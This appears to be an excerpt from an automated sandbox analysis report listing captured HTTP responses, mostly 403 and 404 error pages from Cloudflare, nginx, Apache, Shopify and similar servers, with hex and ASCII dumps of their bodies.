                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:54:50 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=o%2FTQI2qEfukUAeB3BuQv1uwOY8L7LeaaPyfZ2EqX5KNjlC%2Bpiu5fQLiTYYgoTWdCGTHu7Ng4lDadsS3criWd4WjhxY4KBMJtrMsBYJBuL0m91X%2BfwR%2BGT0%2B9BO1ErQh3"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7a59a60c4d6791e3-FRAData Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:54:50 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=VFJBtiQTA1dLExFEUTF3r1t0ZDHA53Pq66qI2gAtqV0QtofnDY6Z2AqbLjjVOq4WS0Zb4kGmcyyI%2BX8wZW3fSqtKJOto0gSSBN4TkTuH5SOsjQlyDLknbtFuY6YlEP4V"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7a59a60cfe2991e3-FRAData Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Mar 2023 06:54:50 GMTContent-Type: text/htmlContent-Length: 19268Connection: keep-aliveServer: ApacheLast-Modified: Fri, 13 May 2022 08:04:11 GMTAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 59 61 6b 75 48 61 6e 4a 50 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 e3 82 b7 e3 83 83 e3 82 af 2c 20 22 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 22 2c 20 22 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 20 50 72 6f 4e 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 4e 22 2c 20 56 65 72 64 61 6e 61 2c 20 4d 65 69 72 79 6f 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 30 33 32 33 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 30 2e 30 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 72 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 34 37 45 46 30 3b 0a 20 20 20 20 20 20 7d 0a 2
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:54:50 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closePermissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Frame-Options: SAMEORIGINCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=L%2BAPyDEejysEp%2BwCKjVG3Gm7NInWiD%2BGyUJFGBirIKqaFc7nQKwUwGYUYLlHrNuXu15Q0P39Q6S7SXFiE9spkdX02Ptd3LwLdcLuzWDQmqxkbOIQE8vZgE%2FsPiKOrw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7a59a60fffe52c33-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 63 34 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 Data Ascii: 1c48<!DOCTYPE html><html lang="en-US"><head> <title>Just a moment...</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=Edge"> <meta
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:54:51 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveServer: nginxVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:54:51 GMTContent-Type: text/htmlContent-Length: 548X-Seen-By: GXNXSWFXisshliUcwO20NXdyD4zpCpFzpCPkLds0yMchjPFu7bfRzggTjXh63HG+,qquldgcFrj2n046g4RNSVIrig9SAqnXW0O7zAzsQkQs=X-Wix-Request-Id: 1678431291.7128013892716281X-Content-Type-Options: nosniffServer: Pepyaka/1.19.10Via: 1.1 googleData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:54:52 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:54:52 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:54:53 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveCache-Control: private, no-cache, no-store, must-revalidate, max-age=0Cf-Railgun: direct (starting new WAN connection)Pragma: no-cacheVary: User-Agent,User-AgentX-Turbo-Charged-By: LiteSpeedCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=8PmEWI4VM8Qxryi4%2FT2mN2TF1X%2FsZMdH%2FP8OHO5%2FqefqSwSZ193fbKkb7sWJvBwu6WZWq1xHItKAYHO%2FgXwri5fiSSB4baqDpoH%2Fv4EDaeAt6SRC5L5TY1CJ5rGNYWb50I0%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7a59a6229ae59a17-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 34 62 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f Data Ascii: 4bf<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 403 Forbidden</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"><h1 style="margin:0; fo
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:54:56 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=7%2B7aBrIxw2HxvbmLhkySJ9YgnuCDWUCGeS709sNTDrZjx4FGOnmfGCYzc9nfO2m6wpyLgYBfOTAyA0wU8uI%2BaFjl5bXsCWVKMhzl4WnV5OVk8ZURftBA3XUT0YH%2BJXfA"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7a59a63539009b5d-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:54:56 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qpRzI672an2lX5GmuTU2jVN2A7xOhJ3SvHye84uwG2StoO8PRRrxJ7y%2Fa8fW8oNz9xobrGHsCwrNRdoXy8RfUDpl6HexCKKb1stX4%2B0zvkvMYf2dwJXcZ9P9hGp6Wk%2FJ"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7a59a63579429b5d-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Mar 2023 06:54:56 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 216X-Sorting-Hat-ShopId: 66042101977X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-europe-west3,gcp-us-east1,gcp-us-east1X-Request-ID: 8cfe822c-e035-4325-872f-d2f185e74539CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=M9z2hIpj2rL6FTqcRmAP%2FWp2tsgoayrybIGGffjqudtCtjEuVV4d1av1edz%2B4Dyvz90OEeaEhYGxtwTp1XgzGijOpLXbWM2CPqJWKpahvZktT9%2B2KteJAfDXWmOp%2BUY%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=148.999929Server: cloudflareCF-RAY: 7a59a6350ffe37c6-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveDate: Fri, 10 Mar 2023 06:54:59 GMTCache-Control: no-storeCache-Control: no-cache, no-store, must-revalidateCache-Control: max-age=0X-Cache-Status: X-Zen-Fury: 3a194512b53243cfbaa325e76516130d54218693Server: ZENEDGEData Raw: 31 66 39 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 20 69 66 20 28 74 79 70 65 6f 66 28 5f 5f 5f 7a 65 6e 29 20 3d 3d 3d 20 22 75 6e 64 65 66 69 6e 65 64 22 29 20 7b 73 65 74 54 69 6d 65 6f 75 74 28 61 72 67 75 6d 65 6e 74 73 2e 63 61 6c 6c 65 65 2c 20 35 30 29 3b 20 72 65 74 75 72 6e 3b 20 7d 5f 5f 5f 7a 65 6e 2e 68 69 63 28 22 5f 5f 5a 45 48 49 43 31 38 33 30 22 2c 20 31 36 37 38 34 33 31 32 37 30 2c 20 31 2c 20 30 2c 20 36 30 29 3b 20 7d 29 28 29 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 68 69 63 2e 6a 73 3f 76 3d 31 36 35 32 31 38 37 36 32 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 64 69 76 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 66 2e 6a 73 3f 76 3d 31 36 35 32 31 38 37 36 32 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 1f9<html><head><title>403 Forbidden</title><script type="text/javascript">(function(){ if (typeof(___zen) === "undefined") {setTimeout(arguments.callee, 50); return; }___zen.hic("__ZEHIC1830", 1678431270, 1, 0, 60); })()</script><script type="text/javascript" async="async" src="/__zenedge/assets/hic.js?v=1652187628"></script></head><body><center><div><h1>403</h1></div><h1>Forbidden</h1></center><script type="text/javascript" async="async" src="/__zenedge/assets/f.js?v=1652187628"></script></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:55:01 GMTServer: Apache/2.4.54 (Unix) OpenSSL/1.0.2k-fipsContent-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 